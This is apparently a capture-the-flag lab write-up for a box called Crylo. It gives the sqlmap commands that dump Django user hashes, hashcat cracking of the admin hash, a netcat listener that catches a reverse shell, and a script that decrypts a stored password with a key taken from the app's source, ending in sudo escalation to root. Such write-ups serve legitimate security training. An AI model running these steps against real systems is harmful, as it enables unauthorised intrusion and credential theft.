# Crylo

*** ## Enumeration ```bash sudo nmap -p- -sS --min-rate 5000 -Pn -n -vv -oA nmap/Crylo 10.64.156.228 PORT STATE SERVICE REASON 22/tcp open ssh syn-ack ttl 62 80/tcp open http syn-ack ttl 62 ``` ```bash nmap -p 22,80 -sCV -oA nmap/openPorts 10.64.156.228 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 64:da:b0:5c:3c:51:1a:55:18:10:30:93:7c:89:38:97 (RSA) | 256 1f:32:83:bd:4b:47:89:03:a4:f8:93:c8:22:a6:36:b9 (ECDSA) |_ 256 05:ac:13:bb:4c:39:00:5a:e0:a3:fc:68:33:24:b7:c3 (ED25519) 80/tcp open http nginx 1.18.0 (Ubuntu) |_http-server-header: nginx/1.18.0 (Ubuntu) |_http-title: Spicyo Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel ``` ```bash ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt -u http://10.64.156.228/FUZZ -t 100 -ic -c login [Status: 200, Size: 13151, Words: 5693, Lines: 314, Duration: 187ms] about [Status: 200, Size: 10720, Words: 4046, Lines: 260, Duration: 236ms] contact [Status: 200, Size: 8858, Words: 3425, Lines: 214, Duration: 245ms] blog [Status: 200, Size: 11402, Words: 4155, Lines: 278, Duration: 326ms] debug [Status: 403, Size: 122, Words: 6, Lines: 11, Duration: 184ms] recipe [Status: 200, Size: 13914, Words: 5897, Lines: 355, Duration: 172ms] ```

## Exploitation ### SQL injection

```bash sqlmap -r req -p username --batch --fingerprint [16:24:16] [INFO] the back-end DBMS is MySQL [16:24:16] [INFO] executing MySQL comment injection fingerprint web server operating system: Linux Ubuntu web application technology: Nginx 1.18.0 back-end DBMS: active fingerprint: MySQL >= 8.0.0 comment injection fingerprint: MySQL 8.0.41 ``` ```bash sqlmap -r req -p username --batch --dbs [*] food [*] information_schema [*] mysql [*] performance_schema [*] sys ``` ```bash sqlmap -r req -p username --batch --current-db current database: 'food' ``` ```bash sqlmap -r req -p username --batch --tables -D food +----------------------------+ | accounts_pin | | accounts_pintoken | | accounts_upload | | auth_group | | auth_group_permissions | | auth_permission | | auth_user | | auth_user_groups | | auth_user_user_permissions | | django_admin_log | | django_content_type | | django_migrations | | django_session | +----------------------------+ ``` ```bash sqlmap -r req -p username --batch --columns -D food -T auth_user +--------------+--------------+ | Column | Type | +--------------+--------------+ | date_joined | datetime(6) | | email | varchar(254) | | first_name | varchar(150) | | id | int | | is_active | tinyint(1) | | is_staff | tinyint(1) | | is_superuser | tinyint(1) | | last_login | datetime(6) | | last_name | varchar(150) | | password | varchar(128) | | username | varchar(150) | +--------------+--------------+ ``` ```bash sqlmap -r req -p username --batch --dump -D food -T auth_user -C username,password +----------+------------------------------------------------------------------------------------------+ | username | password | +----------+------------------------------------------------------------------------------------------+ | admin | pbkdf2_sha256$260000$HxnWVrw647R53GeEUksjW5$SggM3ZAh86qRZtnn0VbWOSmHWhckfVvIsMG+jTZstpE= | | anof | VH6Hj4+eQn5uYGVAxy8Ht7pkVO9oePUpELDdiXFq1V0= | +----------+------------------------------------------------------------------------------------------+ ``` ```bash echo 'pbkdf2_sha256$260000$HxnWVrw647R53GeEUksjW5$SggM3ZAh86qRZtnn0VbWOSmHWhckfVvIsMG+jTZstpE=' > admin.hash ``` ```bash hashcat --identify admin.hash The following hash-mode match the structure of your input hash: # | Name | Category ======+============================================================+====================================== 10000 | Django (PBKDF2-SHA256) | Framework ``` ```bash hashcat -m 10000 admin.hash /usr/share/wordlists/seclists/Passwords/Leaked-Databases/rockyou.txt pbkdf2_sha256$260000$HxnWVrw647R53GeEUksjW5$SggM3ZAh86qRZtnn0VbWOSmHWhckfVvIsMG+jTZstpE=:trigger ```

Right click and select `Open response in browser`

```bash nc -lnvp 1111 Listening on 0.0.0.0 1111 ```

```bash nc -lnvp 1111 Listening on 0.0.0.0 1111 Connection received on 10.65.191.137 40902 bash: cannot set terminal process group (1354): Inappropriate ioctl for device bash: no job control in this shell crylo@ip-10-65-191-137:~/Food/food$ ``` [interactive-shell](https://estebanzarate.gitbook.io/hackache/linux/interactive-shell "mention") ```bash crylo@ip-10-65-191-137:~/Food/food$ cd /home/crylo/ crylo@ip-10-65-191-137:~$ ls Food user.txt crylo@ip-10-65-191-137:~$ cat user.txt ``` ## User flag {% hint style="info" %} fa3\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*59d {% endhint %} ## Lateral movement ```bash crylo@ip-10-65-191-137:~$ cd Food/ crylo@ip-10-65-191-137:~/Food$ ls '~.bash_profile' env food requirements.txt static ven venv virtual crylo@ip-10-65-191-137:~/Food$ cd food/ crylo@ip-10-65-191-137:~/Food/food$ ls accounts assets food manage.py media nano __pycache__ static templates crylo@ip-10-65-191-137:~/Food/food$ cd accounts/ crylo@ip-10-65-191-137:~/Food/food/accounts$ ls admin.py apps.py enc.py forms.py __init__.py migrations models.py __pycache__ tests.py urls.py views.py ``` ```bash crylo@ip-10-65-191-137:~/Food/food/accounts$ cat enc.py # from Crypto.Cipher import AES # from Crypto.Util.Padding import pad from base64 import b64encode, b64decode import base64 # key = '/I02fMuSSvnouuu+/vyyD7NuSEVDB/0gte/z50dM0b4=' # data = 'hello world!' # cipher = AES.new(b64decode(key), AES.MODE_CBC, iv=b'0123456789abcdef') # padded_data = pad(data.encode(), cipher.block_size) # ciphertext = cipher.encrypt(padded_data) # print(b64encode(ciphertext)) #from Crypto.Cipher import AES #from pkcs7 import PKCS7Encoder #key = "8080808080808080".encode() #mode = AES.MODE_CBC #iv = "8080808080808080".encode() #encoder = PKCS7Encoder() # encryptor = AES.new(key, mode, iv) # text = "Test@123" # pad_text = encoder.encode(text) # cipher = encryptor.encrypt(pad_text) # enc_cipher = base64.b64encode(cipher) # secret_text = '{"success":"false", "reason":"User or Password is invalid"}' # #key = 'A16ByteKey......' # mode = AES.MODE_CBC # #iv = '\x00' * 16 # encoder = PKCS7Encoder() # padded_text = encoder.encode(secret_text) # e = AES.new(key, mode, iv) # cipher_text = e.encrypt(padded_text.encode()) # output = (base64.b64encode(cipher_text)) # print(output.decode("utf-8")) # #print("56iPf4PPRmHLusqyKpf7QQ==") from Crypto.Util.Padding import pad, unpad from Crypto.Cipher import AES from Crypto.Random import get_random_bytes data = b'toor' # 9 bytes key = b'\xc9;\xd4b\xce\xc15\x19;\x00Z^Nw\xafp\x10\xce/r\x0c\xf1\x1c&\x1c\x12a\xd9&b"\xc3' iv = b'!6\x0b\xc7Xg@\xcc\xe3KY\xcfN\x9b\x81\x91' cipher1 = AES.new(key, AES.MODE_CBC, iv) ct = cipher1.encrypt(pad(data, 16)) print(ct) #cipher2 = AES.new(key, AES.MODE_CBC, iv) #pt = unpad(cipher2.decrypt(b'\x9f\xc9P\xff\xb3Z\x94\x84\x8a\xeb1\xa2/\xba\x8d\xa5'), 16) #print(pt) #assert(data == pt) ``` ```python from base64 import b64decode from Crypto.Util.Padding import unpad from Crypto.Cipher import AES key = b'\xc9;\xd4b\xce\xc15\x19;\x00Z^Nw\xafp\x10\xce/r\x0c\xf1\x1c&\x1c\x12a\xd9&b"\xc3' iv = b'!6\x0b\xc7Xg@\xcc\xe3KY\xcfN\x9b\x81\x91' encoded = b64decode("VH6Hj4+eQn5uYGVAxy8Ht7pkVO9oePUpELDdiXFq1V0=") cipher = AES.new(key, AES.MODE_CBC, iv) decoded = unpad(cipher.decrypt(encoded), 16) print(decoded.decode()) ``` ```bash python3 decode.py @Pass123@666666666 ``` ```bash crylo@ip-10-65-191-137:~/Food/food$ su anof Password: ``` ## Privilege escalation ```bash anof@ip-10-65-191-137:/home/crylo/Food/food$ sudo -l [sudo] password for anof: Matching Defaults entries for anof on ip-10-65-191-137: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User anof may run the following commands on ip-10-65-191-137: (ALL : ALL) ALL anof@ip-10-65-191-137:/home/crylo/Food/food$ sudo su root root@ip-10-65-191-137:/home/crylo/Food/food# cd root@ip-10-65-191-137:~# ls flag.txt snap root@ip-10-65-191-137:~# cat flag.txt ``` ## Root flag {% hint style="success" %} 201\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*c7e {% endhint %}